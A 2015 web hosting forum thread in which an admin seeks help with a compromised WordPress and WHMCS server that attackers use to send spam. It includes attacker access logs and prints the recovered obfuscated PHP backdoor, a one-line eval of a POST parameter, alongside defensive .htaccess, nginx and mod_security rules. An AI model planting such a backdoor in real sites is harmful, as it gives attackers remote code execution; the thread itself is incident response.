Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


PHP injection
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

PHP injection

Hi, I have one cPanel server with NginX + Apache where there are some Wordpress sites, but there's one that has a lot of injections in with.

Web users are abble to create a php file and with POST then inject thousants of emails using local account.

I've added some extra security and tried it all, but I can't get it.

Any tip about this ?

Thanks.

«1

Comments

  • pro tip: don't use wordpress.

    Thanked by 1KeyJey
  • jarjar Patron Provider, Top Host, Veteran

    Track the POST requests in the logs to find out what plugin/theme file they are exploiting and kill it.

    Thanked by 1netomx
  • TrafficTraffic Member
    edited April 2015

    copy content, remove cPanel account (yes, REMOVE), recreate the site making sure nothing you add (like themes) has a backdoor, done

  • A little more information, this are the logs where injection is done:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    This inside a WHMCS, but it's latest version and autoupdated. Here is when user could write the PHP file.

    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    Verification that file is there .....

    And then a lot of POST entries with one nice email per post:

    202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:24 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:37 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:56 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:03:08 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

  • jarjar Patron Provider, Top Host, Veteran
    edited April 2015

    Those are likely POST requests to files that were changed or added by the malicious visitor/bot. Track them back in the logs, using IPs, file names, and "POST" to grep things out until you find where it began and what the initial file was. However, keep in mind that logins may be relevant as well as they will also brute force, edit a theme file, and then execute it.

    It may help you narrow down the time frame by looking at the modify time on the files, just run "stat [filename]" to grab modify times. Keep in mind that it may be a game of this file made that file which made that file, so you may need to go a ways back.

    Thanked by 1Traffic
  • @Jar said:
    Those are likely POST requests to files that were changed or added by the malicious visitor/bot. Track them back in the logs, using IPs, file names, and "POST" to grep things out until you find where it began and what the initial file was. However, keep in mind that logins may be relevant as well as they will also brute force, edit a theme file, and then execute it.

    It may help you narrow down the time frame by looking at the modify time on the files, just run "stat [filename]" to grab modify times. Keep in mind that it may be a game of this file made that file which made that file, so you may need to go a ways back.

    This is the correct way. But if you forget a file or to fix the original problem, you'll be in the same situation as you are right now. That's why I recommended you to start over again.

    Thanked by 1jar
  • @KeyJey said:
    A little more information, this are the logs where injection is done:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    This inside a WHMCS, but it's latest version and autoupdated. Here is when user could write the PHP file.

    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    Verification that file is there .....

    And then a lot of POST entries with one nice email per post:

    202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:24 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:37 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:56 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:03:08 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

    There is no "system.php" in gravity forms plugin in the language dir.

    http://plugins.svn.wordpress.org/gravity-forms-sticky-list/tags/1.2.12/languages/

    Most probably it's the backdoor, where users are able to inject files... But you have to find out from where it came

    go to your log files dir and try, see if you can figure out from where it was created:
    grep -r "system.php" .

  • u137u137 Member
    edited April 2015

    Disable php execution for such upload directories. Simple to config in nginx, standard setup if you follow the wp hardening instructions. For instance (nginx site config)

        location ~* /(?:uploads|files)/.*\.php$ {
            deny all;
        }
    
    Thanked by 1jar
  • zh-CN

    block China until you figure out a permanent solution

    Thanked by 3Jonchun Quinten Pwner
  • Normally happens when people don't pay for there themes.

  • @funyuns_are_awesome said:
    block China until you figure out a permanent solution

    He will just get hacked from another part of the world. Or from China, though a proxy.

    Thanked by 2jar netomx
  • 4n0nx4n0nx Member

    Would also recommend to start over.

  • @Traffic said:
    He will just get hacked from another part of the world. Or from China, though a proxy.

    You're forgetting that a lot of these attack happen on huge scale, odds are the attacker doesn't care to spend switching proxies, just to get 1 attack back up running...

  • @funyuns_are_awesome said:
    You're forgetting that a lot of these attack happen on huge scale, odds are the attacker doesn't care to spend switching proxies, just to get 1 attack back up running...

    I didn't forget. It's just that that specific chinese attacker is for sure not the only one who can attack this bug - or this backdoor (anyone can exploit most of them).

  • @Traffic said:
    I didn't forget. It's just that that specific chinese attacker is for sure not the only one who can attack this bug - or this backdoor (anyone can exploit most of them).

    Right now it is the only attack, if you read my post again, it was to temporarily get this attacker of his back, to buy time to fix things.

  • @funyuns_are_awesome then it will for sure buy time, but OP can not assume he's safe, he still has a backdoor installed :)

    Thanked by 1jar
  • jarjar Patron Provider, Top Host, Veteran
    edited April 2015

    Traffic said: but OP can not assume he's safe, he still has a backdoor installed :)

    In all of these that I've dealt with, the attacker is only half of the battle as well. Multiple IPs per hour would come in and execute the scripts, from all types of locations. Usually whoever actually caused it, that IP wouldn't be seen again after 24 hours. Working with sometimes up to 30 or so of these events a day at the previous job, the patterns became pretty noticeable.

    Thanked by 2netomx deadbeef
  • nocomnocom Member

    start over2late

  • cassacassa Member

    @Hybrid That is because it has been added using a backdoor. https://wordpress.org/news/2015/04/wordpress-4-2-1/

    Remove the system.php file and update Wordpress, you should be fine after that.

    Thanked by 1netomx
  • Hi, I think that the start of the PHP injection is there, creation of the file:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    

    This is the content of file title.php:

    <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6fc9cb'])){eval(${$s20}['q6fc9cb']);}?>

    Rechecking the logs I saw a POST like this:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    After this IP created that file and sent this POST:

    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    Then I didn't see that IP anymore, but a lot of POSTs started to originate from multiple IPs.

    Before that "title.php" I don't know what else to check.

    Of course, when I see the attack, I inmediatelly move the injected PHP file and keep checking logs and confirming that all is back to normal after see a lot of 404 errors in apache logs.

    @cassa yes, was the latest version with that vulnerability issue, I just manually upgraded to 4.2.1. I really hope this is the problem.

    This has been happening about once or twice times per week for the last 5 weeks, I couldn't find a definitive solution to this.

    I could see always the injection and the attack, the posts ... but never the source of the problem.

    @Jar thanks for the tips, very helpfull !

    @Traffic that site is full of installs and plugins, if I can avoid that, I will. But if I still don't fix this, I'll have to do that as my latest option.

    @Linkking I would never use a patched or nulled theme / script. I know they're full of backdoors ;)

    @Hybrid I guess I found when and where it was injected, but still don't know the source of the problem.

    @u137 it's bot a typical upload php file, I can't block access to PHPs, entire site would stop working. Also affortunatelly it's a cPanel VPS !

    @funyuns_are_awesome yes, local language of the browsers are chinese, but attack IPs (using POST) are coming from all around the worls, most of them in the USA.

  • jarjar Patron Provider, Top Host, Veteran

    Is that a WHMCS install by chance, where that title.php was? Just the folder structure makes me think of that.

  • It's a WordPress site installed in root / and WHMCS installed in /panel.

    But as I can remember, this is aleatory, I mean that other hacks weren't located inside /panel directory. Not sure right now, but I think so.

  • jarjar Patron Provider, Top Host, Veteran
    edited April 2015

    Hmm. Something put that there in the WHMCS folder then. I suppose that's as far back as you found grepping the logs for "title.php" though. This isn't a guarantee, but may find some encoded PHP files if any were missed:

    http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/

    (Codes didn't paste well, the stuff in that article is good though, but may also find legit files)

    Sorry to make you work more! That uneasy feeling, it feels irresponsible not to say it ;)

    Thanked by 1KeyJey
  • I just sent you a PM now abt this ... hehehe.

    Also the link u're suggesting is compromised ! My local antivirus won't allow me to access there ! LOL

    http://snag.gy/IuKoS.jpg

  • Older Gravity forms plugin has issues. See https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html

    Do you use mod_sec for Apache? If not, you should.

    Add this to wp-content/uploads/.htaccess (remove the spaces on the "Files" entry.

    
    < Files *.php >
    deny from all
    </ Files >
    
    

    wp-content/.htaccess

    # Disable access to all file types except the following
    Order deny,allow
        Deny from all
    < Files ~ ".(xml|eot|svg|ttf|woff|otf|ico|css|pdf|jpe?g|png|gif|js)$" >
        Allow from all
    < /Files >
    
    

    Deny access to wp-config.php file. Add this to the root of the web server: .htaccess

    < Files wp-config.php >
    order allow,deny
    deny from all
    < /Files >
    
    

    mod_Sec : Example of blocking links that contain _input__test.php or _input__test.php5

    SecRule REQUEST_URI|ARGS|REQUEST_BODY "_input__test.php" "t:lowercase,deny,status:403,log,id:6505,msg:'_input__test.php query string'"
    SecRule REQUEST_URI|ARGS|REQUEST_BODY "_input__test.php5" "t:lowercase,deny,status:403,log,id:6506,msg:'_input__test.php5 query string'"
    

    mod_Sec : Blocking wp-config.php on links

    SecRule ARGS_GET "wp-config.php" "t:lowercase,deny,status:403,log,id:6507,msg:'wp-config query string'"
    
    Thanked by 1KeyJey
  • @hdpixel, thanks for this useful information, I already updated the .htaccess files in every directory.

    My frontend is NginX, so I don't think mod_sec would work.

    Cheers !

  • Try install wordfence in wordpress.

    Thanked by 1KeyJey
  • wordfence been there since the begginning ;)

  • Sometimes I see this in the log:

    109.236.88.29 - - [28/Apr/2015:09:12:38 -0300] "GET / HTTP/1.0" 200 60960 "-" "ANTIPIDERSIA"

    Sounds like "The bad guy" taking a look ;)

  • @KeyJey said:
    wordfence been there since the begginning ;)

    With wordfence, find out what's files changed.

    Thanked by 1KeyJey
Sign In or Register to comment.